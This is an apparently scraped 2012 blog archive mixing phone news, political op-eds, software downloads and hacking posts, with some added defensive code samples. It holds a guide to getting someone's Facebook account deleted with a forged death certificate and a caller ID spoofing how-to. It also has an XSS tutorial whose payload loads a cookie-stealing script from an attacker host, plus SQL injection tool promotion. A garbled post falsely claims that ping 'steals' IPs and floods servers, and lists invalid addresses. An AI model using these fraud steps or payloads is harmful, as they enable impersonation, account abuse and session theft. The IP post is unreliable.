
Sopho Antivirus Home Edition

Written By Unknown on Saturday 30 June 2012 | 15:07





Promising to be an application that is easy to install and simple to use, Sopho Antivirus brings the same quality as other SophosLabs products, preventing the spread of malware for Mac OS X or Windows and also removing threats that have managed to infect your machine.
It is a universal binary (Intel and PowerPC) compatible with Mac OS X 10.4, 10.5 and 10.6, and requires at least 256MB of RAM and 150MB of disk space.


DOWNLOAD: LINK

The Mole v0.3 – Automatic SQL Injection Exploitation Tool

Written By Unknown on Friday 29 June 2012 | 07:54

The Mole is an automatic SQL injection exploitation tool. Given only a vulnerable URL and a valid string on the site, it can detect the injection and exploit it, using either the union technique or a boolean query based technique.

Features

  • Support for injections using MySQL, SQL Server, Postgres and Oracle databases.
  • Command line interface. Different commands trigger different actions.
  • Auto-completion for commands, command arguments and database, table and column names.
  • Support for filters, in order to bypass certain IPS/IDS rules using generic filters, and the possibility of creating new ones easily.
  • Exploits SQL injections through GET/POST/Cookie parameters.
  • Developed in Python 3.
  • Exploits SQL injections that return binary data.
  • Powerful command interpreter to simplify its usage.

Disclaimer: Usage of The Mole for attacking web servers without mutual consent can be considered as an illegal activity. It is the final user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program.

You can download The Mole v0.3 here:

Windows – themole-0.3-win32.zip
Linux – themole-0.3-lin-src.tar.gz
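
Why a URL parameter plus a "valid string" is enough for the boolean technique, and why bound parameters remove that signal: the following is an added example, not code from The Mole or from the original post. The `articles` table, the handler names and the sample data are constructed for illustration, and the check is meant to be run against your own handlers as a regression test.

```python
import sqlite3

# The "valid string": text that appears on the page when the query finds a row.
MARKER = "Welcome to the site"


def make_db():
    """Build a constructed, in-memory database holding a single article."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT)")
    db.execute("INSERT INTO articles VALUES (1, ?)", (MARKER,))
    return db


def render(row):
    """Turn a query result into the page body the visitor sees."""
    return f"<h1>{row[0]}</h1>" if row else "<h1>Not found</h1>"


def page_concatenated(db, article_id):
    """Vulnerable handler: the parameter is pasted into the SQL text,
    so any condition appended to it is evaluated by the database."""
    query = f"SELECT title FROM articles WHERE id = {article_id}"
    try:
        return render(db.execute(query).fetchone())
    except sqlite3.Error:
        return "<h1>Error</h1>"


def page_parameterized(db, article_id):
    """Hardened handler: the parameter is bound as data and is never
    parsed as SQL, whatever characters it contains."""
    query = "SELECT title FROM articles WHERE id = ?"
    return render(db.execute(query, (article_id,)).fetchone())


def boolean_condition_leaks(handler, db):
    """Return True when an always-true and an always-false condition added
    to the parameter change whether the valid string appears on the page.
    That difference is the one-bit signal a boolean based technique reads."""
    true_page = handler(db, "1 AND 1=1")
    false_page = handler(db, "1 AND 1=2")
    return MARKER in true_page and MARKER not in false_page


if __name__ == "__main__":
    db = make_db()
    for handler in (page_concatenated, page_parameterized):
        print(handler.__name__, "leaks:", boolean_condition_leaks(handler, db))
```

The parameterized handler still serves the legitimate request for article `1`; it only stops treating the rest of the value as SQL.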



A Tax Is a Tax Is a Tax

Written By Unknown on Thursday 28 June 2012 | 14:10



Of course the stock market dropped about 130 points. Twenty new or higher taxes across-the-board are bad for economic growth, bad for job hiring, bad for investors, and bad for families.

A tax is a tax is a tax, according to Judge Roberts. But he forgot to say that if you tax something more, you get less of it.

Presumably Mitt Romney will make this case in a major way. Hopefully he won’t forget that Obamacare is not just a huge tax hike. It’s also a major new spending entitlement that’s already pegged at $2.5 trillion and will increase the federal debt burden much faster than the GDP expands.

In other words, tax, spend, regulate, borrow. The Obama mantra. Romney must go after it -- time and time and time again.

Bankrupting the economy is not exactly a job-creator.



SQL Injection Scanners List !


sqlmap ( http://sqlmap.sourceforge.net/ )
Full support: MySQL, Oracle, PostgreSQL and Microsoft SQL Server.
Partial support for: Microsoft Access, DB2, Informix, Sybase and Interbase.

Safe3 SQL Injector ( http://sourceforge.net/projects/safe3si/files/ )
Full support: MySQL, Oracle, PostgreSQL, MSSQL, Access, DB2, Sybase, SQLite.

SQL Power Injector ( http://www.sqlpowerinjector.com/ )
Supports: Microsoft SQL Server, Oracle, MySQL, Sybase / Adaptive Server and DB2.

Absinthe ( http://www.0x90.org/releases/absinthe/index.php )
Supports: Microsoft SQL Server, MSDE, Oracle, and Postgres.

bsqlbf-v2 ( http://code.google.com/p/bsqlbf-v2/ )
Supports: MySQL, Oracle, PostgreSQL and Microsoft SQL Server.

Marathon Tool ( http://www.codeplex.com/marathontool )
Supports: MySQL, Oracle, Microsoft SQL Server and Microsoft Access.

Havij ( http://itsecteam.com/en/projects.htm )
Supports: MySQL, Oracle, Microsoft SQL Server and Microsoft Access.

pysqlin ( http://code.google.com/p/pysqlin/source/checkout )
Implemented: Oracle, MySQL and Microsoft SQL Server.

BSQL Hacker ( http://labs.portcullis.co.uk/application/bsql-hacker/ )
Implemented: Oracle and Microsoft SQL Server.
Available experimental support for MySQL.

WITOOL ( http://witool.sourceforge.net/ )
Implemented: Oracle and Microsoft SQL Server.

Sqlninja ( http://sqlninja.sourceforge.net/ )
Supports only Microsoft SQL Server.

sqlsus ( http://sqlsus.sourceforge.net/ )
Supports only MySQL.

DarkMySQLi16.py ( http://vmw4r3.blogspot.com/ )
Supports only MySQL.

mySQLenum ( http://sourceforge.net/projects/mysqlenum/ )
Supports only MySQL.

PRIAMOS ( http://www.priamos-project.com/ )
Supports only Microsoft SQL Server.

SFX-SQLi ( http://www.kachakil.com/ )
Supports only Microsoft SQL Server.

DarkMySQL ( http://vmw4r3.blogspot.com/ )
Supports only MySQL.

ProMSiD Premium ( http://forum.web-defence.ru/showpost.php?p=12402&postcount=15 )
Supports only MySQL.

yInjector ( http://y-osirys.com/softwares/s-softwares/id10 )
Supports only MySQL.

Bobcat SQL Injection Tool ( http://www.northern-monkee.co.uk/pub/bobcat.html )


WebRaider ( http://code.google.com/p/webraider/ )
Supports only Microsoft SQL Server.
Designed to execute commands on the server (reverse shell).

Pangolin ( http://www.nosec.org/2009/0920/74.html )
Pangolin is distributed on a commercial basis, but is also available in a free version with limited functionality.
Implemented: Oracle, Microsoft SQL Server 2000/2005, Sybase, Access, MySQL, DB2 and Informix.

Toolza 1.0 (SQL injection supported DB: Mysql, Mssql, Sybase, Postgresql, Access, Oracle, Firebird / Interbase): http://bug-track.ru/prog/toolza1.0.rar


MySQL >= 4.x: https://forum.antichat.ru/threadnav43966-1-10.html
MySQL 3.x: http://forum.antichat.ru/showthread.php?t=20127
MSSQL: http://forum.antichat.ru/thread15087.html
ORACLE: http://forum.antichat.ru/showthread.php?t=40576
PostgreSQL: http://forum.antichat.ru/thread35599.html
MSAccess: http://forum.antichat.ru/thread50550.html

http://devteev.blogspot.com/2010/01/sql-injection.html
 http://pentestmonkey.net/cheat-sheets/

source: http://esploit.blogspot.com

UK carriers won't offer a subsidized Nokia 808 PureView

If you are a UK resident, hoping to get the 41MP of camera goodness that is the Nokia 808 PureView at a nicely subsidized price, we have some bad news for you. None of the British carriers will be offering the Symbian smartphone, so getting it SIM-free will be your only option.

O2, Three and Everything Everywhere (which is the company behind the UK branches of Orange and T-Mobile) have all confirmed that they won't be carrying the device and so has Vodafone Britain. Virgin Mobile UK has left the door open for further negotiations with Nokia stating that it won't be offering the Nokia 808 PureView "yet", but you shouldn't get your hopes too high.

It's obvious that carriers prefer to subsidize smartphones running on data-hungry platforms like iOS, Android and Windows Phone and the expensive data plans that go with those, so we guess turning a deaf ear to the Nokia 808 PureView was expected. Symbian is not exactly the preferred OS for those who like to constantly stay connected, so carriers have little return on their investments in it.

So, spending about £500 on a Nokia 808 PureView seems like your only chance of getting the device. Still interested?

Source

Nokia 808 PureView UK pre-orders to ship on June 30

The Nokia 808 PureView pre-orders at UK retailers' sites are finally starting to list launch dates. Amazon UK will be among the first stores to get it.

Amazon UK has the 808 PureView (black and white) listed for £500 ($780) with a release date of June 30. That's for a SIM-free phone naturally, with VAT included.

Play.com also has the 808 and it's asking £520 for it. They will be releasing the phone on July 2.

Clove UK is less clear on the launch date - the site notes "First stock delayed until mid-late July. Color variants to be confirmed." The price is set at £504.

Then there's Expansys UK, which lists all three color versions (black, white and red) at £500, but there's no launch date given.

We checked the sites of UK carriers for the Nokia 808 PureView but there's nothing there yet.

Nokia Lumia 800 and 710 get Camera Extras, more apps

The Nokia Lumia 900 and Lumia 610 already received some of the updates that Nokia promised (in the US and China at least) at the WP summit and now it's time for the older duo - the Lumia 800 and Lumia 710 - to get their own. There's a little something for the 900 and 610 too.

To be clear, the new apps are available in the US and China for now. They will be released worldwide in July.

Camera Extras include four features - Smart Group Shot (which uses Scalado's technology), Action Shot (which does burst shot), Self timer and Panorama (these two are self-explanatory).

Check out this video for more details on Camera Extras.

The Nokia Lumia 800 and Lumia 710 are getting two other features - Internet sharing (Wi-Fi tethering) and flip-to-silence (muting alarms and ringers by flipping the phone over).

The 900 and 610 already have these features, but there's something new for them as well. It's called contact share, it's going to be available to all Lumia smartphones, and it lets you send and receive Business cards over SMS.

The Play To app, which enables DLNA on all Lumias, is already available for download.

To install the new apps, your Lumia 800 or Lumia 710 will have to be updated to Windows Phone 7.5 (are there even any people who haven’t updated yet?).

Source

No Economic Miracle if Obamacare is Overturned

It may well be that the complex tax-and-regulatory mandates embodied in Obamacare have proven to be a deterrent for business job creation. You hear it all the time from men and women in business -- especially smaller businesses, but large companies too.


However, color me skeptical that business will embark on a hiring binge if the Supremes overturn the Obamacare mandate tomorrow. Why? Because the uncertainty premium about future health-care policy is still going to be high, and it won’t be resolved until well after the election. Businesses will have almost no idea what Congress will propose if the Supremes strike down Obamacare.

For example, it’s going to take money and high insurance premiums to cover preexisting conditions. There also are the stay-at-home 26 year olds and the so-called health-care market exchanges among the states. There are many other issues to be resolved, but the big question is: How will they be financed?

Will there be a tax? Will there be regulations?
One thing’s for sure. A pure free-market health-care system is not going to happen. Many Republicans talk about a patient-centered consumer-choice system, which would be great. Give consumers tax credits for the same deductions that businesses now have. That also would be great. Include interstate insurance competition. Another winner. Tort reform. Another plus.

But the fiscal reality for health-care insurance and payouts to doctors in hospitals is going to be up in the air for quite some time. It’s a known unknown. And because of that, I think businesses are still going to sit on their hands until they know with greater certainty what the cost of hiring the extra worker is really going to be.

For the foreseeable future, there’s no economic miracle if the Supremes strike down Obamacare (as I believe they will).



Which is the most popular antivirus software?



In an overcrowded antivirus software market, end users and corporate users often find it difficult to tell a value-added market proposition from the “me too” vendors of solutions. As in every other market segment, any scientific insight into the market share of various vendors offers an invaluable perspective into the market dynamics, what customers are purchasing and, most importantly, whether they are living in a world of a ‘false feeling of security’.

Using a data set consisting of 120,000 data points, researchers from OPSWAT recently released an informative overview of the antivirus market, answering an important question - which is the most popular antivirus vendor?

According to their findings, that’s avast! Free Antivirus, followed by Microsoft Security Essentials and ESET NOD32 Antivirus.

Detailed market share statistics:

Avast - 17.4% worldwide market share
Microsoft - 13.2% worldwide market share
ESET - 11.1% worldwide market share
Symantec - 10.3% worldwide market share
AVG - 10.1% worldwide market share
Avira - 9.6% worldwide market share
Kaspersky - 6.7% worldwide market share
McAfee - 4.9% worldwide market share
Panda - 2.9% worldwide market share
Trend Micro - 2.8% worldwide market share
Other - 11.1% worldwide market share

Microsoft is the market leader in North America, followed by Symantec and AVG. Not surprisingly, the market leading avast! Free Antivirus is relying on the so called “freemium” business model, where the company grows and gains market share by offering a free alternative of their software, and earns revenue thanks to the successful conversion of free users to paid ones. Earlier this year, the company announced that it has 150 million active users worldwide, a clear indication of a working “freemium” business model.

What do you think? Is antivirus software still relevant in the age of Stuxnet, Duqu and Flame, the so called poster kids of the DIY targeted attack toolkits and weaponized malware releases? Do you think free antivirus is offering a ‘false feeling of security’ compared to subscription based license models?

Comodo Antivirus for Mac

Written By Unknown on Wednesday 27 June 2012 | 15:07





Comodo Antivirus is easy to install and configure, has automatic online updates and removes all currently known viruses. Virus definitions are downloaded and updated automatically according to the schedule configured within the program, or with a single click on the updater button.
Once installed, Comodo AntiVirus sits quietly in the system tray, efficiently defending your computer against the latest virus attacks. It is quite lightweight and does not slow your computer down, nor does it use excessive memory or disk space.
Some of its features are:
  • Detects and removes viruses from environments and networks
  • Constantly protects access in real time
  • Analysis intercepts unknown threats
  • Blocks malware before it is published
  • Daily automatic updates of virus definitions

DOWNLOAD: LINK

UnRarX 2.2





UnRar X 2.2 is an application for Mac OS X that decompresses RAR archives and can also recover damaged archives of the same format.
To unpack an archive in RAR format, the user only has to drag and drop the RAR onto the UnRar X window or icon, and it is decompressed automatically.
 DOWNLOAD: LINK


Safari AdBlock








Safari Adblock is an extension for Safari 5 that improves protection against advertisements and unwanted windows that pop up on your screen while you browse the net.
The extension even blocks Flash advertisements that wander across your pages and are very annoying to close.
Block unwanted ads and enjoy faster, safer browsing with this simple extension.

DOWNLOAD: LINK

Download and Install Qflash Flash Maker for Ubuntu, with Tutorial


The Flash maker applications currently available on Linux are not yet on par, in terms of features, with Flash Maker applications in the Windows desktop environment such as Flash MX. However, for the basic need of creating flash animations, the Flash Maker applications available on Linux are already sufficient. In fact, Flash Maker applications on Linux have an advantage of their own: they are very lightweight and memory-efficient.

One Flash Maker application on Linux that is fairly simple and easy to use is Qflash. Although the Qflash project is no longer being continued, the application can still be used on today's Linux desktops and remains functional. For that reason, I packaged Qflash as a Debian installer package so that Debian/Ubuntu Linux users can install it easily. Oh, and before I forget, the Qflash package depends on the libqt3-mt and libstdc++5 packages, so before downloading and installing the Qflash package, make sure both packages are installed on your Ubuntu / Debian system. If you use Gdebi, the dependencies are installed automatically during installation; otherwise you must install both packages first:

sudo apt-get install libqt3-mt libstdc++5

At a friend's request, I also wrote a simple tutorial, in PDF form, on creating flash animations on Linux using Qflash. Below are the Qflash package in Debian format and its simple tutorial, which you can download. I hope it is useful. Keep moving forward, Linux :)

Qflash installer in Debian format

Simple Qflash Tutorial in PDF

WiFi Hack Ultimate AIO (2011)

Here's why current WP phones won't get Windows Phone 8

Written By Unknown on Tuesday 26 June 2012 | 10:08

Microsoft caused a lot of excitement when they announced Windows Phone 8, but also a good deal of disappointment when it became clear that the new OS won't be coming to the current crop of Windows Phone devices.

There's a reason for that - the two OSes may look similar on the outside, but they are vastly different on the inside. The new core that enables so many cool features (multiple CPU cores, better graphics) is shared with Windows 8 RT (based on Windows NT) and not Windows Phone 7 (based on Windows CE, same as Windows Mobile).

Microsoft’s senior marketing manager for Windows Phone, Greg Sullivan, says that it's not impossible to port WP8 on older devices, but the cost of doing that would be very high and the benefit very little - WP8 enables multi-core support, higher resolution screens, NFC, microSD card support and so on, none of which will make a difference on the legacy hardware.

What they are getting (as part of the Windows Phone 7.8 update) is the new start screen - it's the most noticeable change in the OS and will actually benefit the current Windows Phone smartphones.

Users who move to the new version of the OS will get to keep using their Windows Phone 7 apps as those will work on WP8. There's no backwards compatibility for the newly developed WP8 apps though and there's nothing that can be done about it - for example, the Adreno 205 just won't cut it for games intended for a Snapdragon S4 (which packs an Adreno 225 or 305).

Source

Amazon gives Lumia 900 for $0.01, AT&T contract still required

The US Amazon is selling Nokia Lumia 900 for AT&T for 1 cent once again, and this time the offer isn't even limited to new users only.

Nokia Lumia 900 for AT&T offers LTE connectivity and is the company’s current WP flagship. The fact that it won't get to taste Windows Phone 8 is pretty damaging for the Lumia 900 market prospects, but maybe this promotion and the consolation WP7.8 update will help.



Still, WP8 smartphones probably won't be on the market for at least another four or five months, so if you are about to sign an AT&T contract, you might as well take Nokia's offer for free lifetime navigation, a 4.3" AMOLED and a super cool polycarbonate unibody.

Source | Via

Check out a Lumia 900 running the new WP 7.8

A Senior Manager over at Redmond's Microsoft campus got hold of a Nokia Lumia 900 running a very early build of Windows Phone 7.8 and decided to tape the new homescreen and upload it to YouTube.

He demonstrates the live tiles resizing in all three modes - small, medium and large. Doing so also changes the amount of information that the tile gives you. For example a small SMS live tile gives you only the number of unread messages, while a large one also gives you a quick preview.
Microsoft has also posted a dedicated page, detailing the new features that will come to existing 7.5 users via the WP 7.8 update - you can find it here (note that an account is needed to view it).

Among the highlights are the new Start screen, the currently around 100 thousand apps for WP and information about the Lumia-exclusive camera enhancements and a new way of sharing contacts and track data usage.

Source | Via

One-on-One with Marco Rubio


The run-up to the presidential election is really a debate about growth and taxes, Sen. Marco Rubio of Florida told CNBC on Monday.

“Growth helps the debt be more manageable, unemployment, all of these things,” he said in an interview on “The Kudlow Report.”

“Tax increases do not lead to growth,” he said. “The reason why I oppose increases in taxes is not some religious objection, or even an ideological one. It is the knowledge that increasing taxes discourages growth.”

Rubio said that taxes remove money that was going to be spent into the economy. “When the government spends that dollar, they’re going to be a lot less efficient, a lot less stimulative,” he said.

Rubio, who is being considered a vice presidential running mate by presumptive Republican nominee Mitt Romney, also spoke about the debt crisis, health care and Arizona’s controversial immigration law, on which the U.S. Supreme Court ruled Monday.

Asked by Larry Kudlow whether there could be a compromise like the one former Florida Gov. Jeb Bush mentioned in an earlier appearance — $10 of spending cuts for every $1 of revenue increases — Rubio held firm.

“I’ve always believed that was a false choice. The goal is not to give each side what they want,” Rubio said. “The goal is to solve the problem.”

Hours after the nation’s highest court upheld one of the most controversial parts of Arizona’s immigration law — that police can make checks for immigration status — Rubio agreed with the decision. “I’ve always believed the Arizona immigration law was constitutional,” said Rubio, the son of Cuban immigrants, even as he admitted “mixed feelings” about it initially.

Part of the law that was upheld instructs law enforcement officials to verify the immigration status of anyone they detain.

“I understand why Arizona did it. I understand why the people of Arizona are frustrated. I believe they have the 10th Amendment right to pass that law,” he said.

But the federal government, Rubio added, needed to fix the problem with a few steps: “Secure the border, have an electronic verification system in place and modernize our legal immigration so it reflects the 21st century needs of our country.”

Weighing in on health care, Rubio said he would like to see the Obama administration’s Affordable Care Act be replaced with a free-market system in which insurance companies compete for consumers’ dollars.

“I think once there’s more choice, once the consumer is in charge of their health care dollars, the market’s going to meet that demand. Now all of a sudden, companies are going to try to figure out how to make themselves more attractive so that you choose them over somebody else. Right now they don’t have to do that,” he said.

“From the point of view of the marketplace, insurance companies, if they want my business, if I control my health care dollars, and I get to choose from any insurance company I want, I’ll go to you and say, ‘Hey guys, I would love to buy your insurance, but I have a kid who is sick. Will you cover them as well? Because this other guy will cover them, and I’ll go with them if you don’t do the same.’ I think that now the consumer is empowered to make that argument.”

Rubio said that for chronically ill Americans, state governments could create high-risk pools to provide insurance.

“I think that’s the one focused, narrow place where government — state government — can be helpful to folks,” he said.

Rubio was not asked about any possible run for vice president. On NBC’s “Meet the Press” on Sunday, Rubio declined to answer questions about it.

Close Any Facebook Account In 24 Hours



Just Follow the steps:
Step 1 - Go to this url:
http://www.facebook.com/help/contact.php...m=deceased

So this is the Url we will use to Report our slave. This Form allows you to report a deceased person (someone who is dead).

Step 2 - Complete the Fields:

Explain:
Full Name: Your Victims Full name(Name last name)
Date of birth: Go at his profile and click at Info tab and get his date of birth.
Account Email Addresses: Do the same thing, go to his profile and click on info tab and get his email addresses.
Networks: Again,go to his profile and click on Info tab and get his networks, copy them and paste in the form.
Web address of profile you would like to report: Just go to his profile and copy the link in the address bar.
Relationship to this person: To make more believable select Immediate Family.
Requested Action: Remove Profile
Proof Of Death: This is the hardest part of this form. Now to make a proof of a death just Google in your language a "Death Certificate" or "Certificate of a Death". It doesn't matter from what country you are, just use this Italian certificate and open up Photoshop or whatever image editor and just write in a blank field:
Annunciamo il morte di [name goes here]. Save your image to desktop and upload it in one of the free image hosting sites like: http://imageshack.us
And it's done ;)... Italian Death Certificate:
Additional Information: Write what you want, just write that you are in his/her family and you would like to close his/her Facebook account because you won't like that when he is dead, his Facebook is opened.

Step 3 - Click on Submit and then a message will appear:
Your injury was submitted at Facebook Team .. So the meaning is that one of the mod's of Facebook will review your report and will do the right decision. It works in most of the times. I closed a few ones.

GoodBye DDos Tool

IP Addresses (Internet Protocols) and how to steal them

IP stands for Internet Protocols. An IP address is the address for servers and a person's computer who is connected to the internet. Everyone on the internet has an IP address, and once you find out what it is, you know exactly where they are, and you can begin to hack them.

Internet Protocols Addresses are usually made up of random numbers separated by dots. Every IP address is unique, no one can have the same one. This is why it is very important that you're careful when typing, you do NOT want to accidentally hack the wrong person/network.
  • 66.17.44.186
  • 81.73.50.42
  • 192.168.1.1
  • 127.0.0.1
  • 84.10.1.5982
  • 17.44.186
  • 816.83.337.04
Obtaining a target's IP address is the first step to prepare for an attack. Explained below are methods of obtaining a victim's IP address.

Ping - the easiest way to steal an IP
Ping is a tool used to endlessly make requests to a server or another person. It works with both IP address or domain names. Domain names are the addresses that you type in to go to a website. Domain names are easier to remember, which is why the internet was invented.
Either way, by pinging a site, you can easily over-load it with requests, and at the same time obtain the IP. Ping is supported in Microsoft DOS, as shown below:
As you see, the hacker here is using Windows XP (a good choice), and in order to get the IP of mediacollege.com, the only thing he had to do was open up a DOS prompt and type in ping mediacollege.com. Upon doing so, mediacollege.com was instantly hit with 4 requests which distracted their server long enough in order for Ping to steal the IP address.

source: http://www.elite-hackers.com

How to Spoof Caller ID ? Caller ID Spoofing

Written By Unknown on Monday 25 June 2012 | 08:40




Caller ID spoofing is the act of making the telephone network display any desired (fake) number on the recipient’s Caller ID display unit instead of the original number. Caller ID spoofing can make a call appear to have come from any phone number that the caller wishes. Have you ever wondered how to perform Caller ID spoofing? Read on to know more about Caller ID spoofing and find out how it is performed.
Unlike what most people think, an incoming call may not be from the number that is displayed on the Caller ID display unit. Because of the high trust that people have in the Caller ID system, it is possible for the caller to easily fool them and make them believe that the number displayed on the Caller ID display is real. This is all possible through Caller ID spoofing.




How to Spoof Caller ID? 

You can easily spoof any Caller ID using services like SpoofCard. In order to use the SpoofCard service, you need to pay in advance and obtain a PIN (Personal Identification Number) which grants access to make a call using the Caller ID spoofing service. Once you have purchased the service, you will be given access to log in to your SpoofCard account. To begin with, you need to call the number given by SpoofCard and enter the PIN. Now you will be given access to enter the number you wish to call and the number you wish to appear as the Caller ID. Once you select the options and initiate the calling process, the call is bridged and the person on the other end receives your call. The receiver would normally assume that the call was coming from a different phone number, i.e. the spoofed number chosen by you, and is thus tricked into thinking that the call was coming from a different individual or organization than the caller’s. In this way it is just a cakewalk to spoof Caller ID and trick the receiver on the other end. Thus you neither need to be a computer expert nor have any technical knowledge to perform Caller ID spoofing. For more information on the SpoofCard service visit the following link.

SpoofCard


How Caller ID Spoofing works?

Caller ID spoofing is done through various methods and using different technologies. The most commonly used technologies to spoof Caller ID are VOIP (Voice Over IP) and PRI (Primary Rate Interface) lines.
Today most VOIP systems provide an option for their users to enter whatever number they want in the calling party field, and this number is sent out when they make a call. Hence it is easily possible for any user to spoof Caller ID provided they have a VOIP system and know how to properly configure it to spoof the Caller ID. However, sites like SpoofCard provide easy and cheap spoofing services for those who aren’t using VOIP systems that they can configure themselves.

Caller ID spoofing has been possible, and has been performed, right from the days the Caller ID system was introduced. However, most people are unaware of the fact that it is possible to spoof Caller ID and make any number be displayed on the receiver’s end. In the past, Caller ID spoofing service was mostly used by telemarketers, collection agencies, law-enforcement officials, and private investigators, but today it is available to any Internet user who wishes to perform Caller ID spoofing.



source: http://mmcracker.multiply.com

Cross Site Scripting(XSS) Complete Tutorial for Beginners

Written By Unknown on Sunday 24 June 2012 | 14:01




What is XSS?
XSS stands for Cross Site Scripting. Don't confuse this with CSS (Cascading Style Sheets). It is one of the top web application vulnerabilities. This vulnerability allows the attacker to insert client-side scripts (especially JavaScript). Using this vulnerability, an attacker can inject malicious code, leading to malware attacks, phishing and session hijacking.

XSS Vulnerability and Injection:

Step 1: Finding Vulnerable Website
As usual, an attacker will search Google using a Google dork. For example, he will search for "search?q=" or "search.php?q=". This returns plenty of websites. There are plenty of Google dorks; hackers find their own dorks and search with them. If you have bad luck, it will be your site.

Step 2: Testing the Vulnerability
In order to test the vulnerability, we need to find a POST or GET parameter. Confused? It is just an input field whose value is sent to the server, for example a search query, username or password.
There are two ways to test the vulnerability:

Method 1: Injection in a form box (especially a search box)
An attacker can enter the malicious script inside the search box and click the search button. This causes the malicious script to run inside that website.


Method 2: Injecting in the URL
In this method, there may not be any form box. The URL field is used instead.
For example:

http://vulnerablewebsite/search?q=malicious_script_goes_here
For testing purposes, insert
<script>alert('hi');</script>
in the input fields.

For example:
Using method 1, you can enter the code in the search box and click the search button.
or
Using method 2, you can enter the code in the URL like this:
http://vulnerablewebsite/search?q=<script>alert('hi');</script>

If it shows a "hi" message in a popup box, then the site is vulnerable to XSS.


Step 3: Injecting Malicious Scripts
After finding a vulnerable site, an attacker will inject malicious scripts. This may lead to cookie stealing and malware attacks, as said before.

Let us assume an attacker has a cookie-stealing script on his website. For instance, his malicious script URL is

http://attackerSite/malicious.js
He can now inject the malicious script inside the vulnerable site like this:
<script src=http://attackerSite/malicious.js></script>
When visitors load the website, the malicious script starts to run and steals their cookies.

Types of XSS Based on Persisting Capability:

There are two types of XSS based on persisting capability, namely Persistent and Non-Persistent.

Persistent XSS:
This is the riskier XSS vulnerability: the application stores the supplied data on the server, so the injected malicious script is permanently stored in the web application. It will be shown to other users when they visit the site.
If the attacker injects malware, then regular users of that website are also infected.

For example:
Some sites may store the search query in order to track user interest. This results in permanent storage of the XSS.

Non-Persistent XSS:
Also referred to as Reflected XSS. In this case, the storage of the malicious script is temporary (meaning it won't be shown to other users). The attacker may trick users into visiting the URL with the injection. As they are regular users of that site, they will trust the link. This leads to cookie stealing.

For example:
When you search on some site, it will return the result along with your search string. This causes the malicious code to run temporarily.
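
From the site owner's side, both the reflected search echo and the stored search query described above are closed by encoding the value when it is written into HTML. The following is an added example, not part of the original post; all function names are hypothetical and the sample URL is the tutorial's own test string.

```javascript
// Added example: function names are hypothetical, sample input is constructed.

// Encode the five characters that let text break out of HTML element
// content or a quoted attribute value.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Reflected case, vulnerable: the q parameter is echoed into the page as-is.
function renderResultsUnsafe(q) {
  return `<p>Results for: ${q}</p>`;
}

// Reflected case, hardened: the same page with q encoded on output.
function renderResultsSafe(q) {
  return `<p>Results for: ${escapeHtml(q)}</p>`;
}

// Persistent case: queries are stored raw and encoded every time they are
// rendered, so later visitors receive inert text instead of markup.
const recentSearches = [];
function recordSearch(q) {
  recentSearches.push(String(q));
}
function renderRecentSearches() {
  const items = recentSearches.map((s) => `<li>${escapeHtml(s)}</li>`).join('');
  return `<ul>${items}</ul>`;
}

// Extract q from a request URL the way a server-side handler would.
function queryFromUrl(url) {
  return new URL(url).searchParams.get('q') || '';
}

// Constructed sample request carrying the tutorial's test string.
const sampleUrl = "http://vulnerablewebsite/search?q=<script>alert('hi');</script>";
const q = queryFromUrl(sampleUrl);
recordSearch(q);
console.log('unsafe:', renderResultsUnsafe(q));
console.log('safe:  ', renderResultsSafe(q));
console.log('stored:', renderRecentSearches());
```

The encoding shown is only correct for HTML element content and quoted attribute values; values placed inside a script block, a URL or a style rule need the encoding for that context.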

What can an attacker do with this Vulnerability?

  • Stealing identity and confidential data (credit card details).
  • Bypassing restrictions in websites.
  • Session hijacking (stealing sessions).
  • Malware attacks.
  • Website defacement.
  • Denial of Service (DoS) attacks.
Disclaimer: This article is for educational purposes only. It is written so that pentesters and ethical hackers can understand this web application vulnerability. It will also educate webmasters so that they can protect themselves.


Backlink- http://www.breakthesecurity.com
source: http://www.defencehacker.in

Nokia 808 PureView gets its first firmware update

It's been just over a week since the Nokia 808 PureView went on sale, and Nokia has already given the phone its first firmware upgrade.




Although an official change log is not available, according to All About Symbian the update brings improvements in scrolling performance, quicker saving of the 38-megapixel images, smoother auto-rotation, and other performance enhancements and bug fixes.

The v112.020.0310 update is now available over-the-air and can be downloaded directly on to your phone, or you can download it by connecting your phone to Nokia Suite.

Click here to read the full review of the Nokia 808 PureView.

Source

Nokia outs exclusive Camera Extras app for Lumia phones

Nokia has released a special app for its Lumia series of smartphones. Currently available on the Windows Phone Marketplace, the Camera Extras app will give users four new shooting modes for their devices.



The new modes are Smart Group Shot, Action Shot, Self-timer and Panorama shot. The first one allows you to capture burst shots of a group of people and then automatically chooses the best one judging by facial expressions, while the second allows you to capture fast-moving objects by improving shooting speed. The other two are quite self-explanatory.

For now only users in China and the United States are bound to get the update. Other countries will follow later in July. Head to the Windows Phone Marketplace to get the juicy app now.

Source | Via
 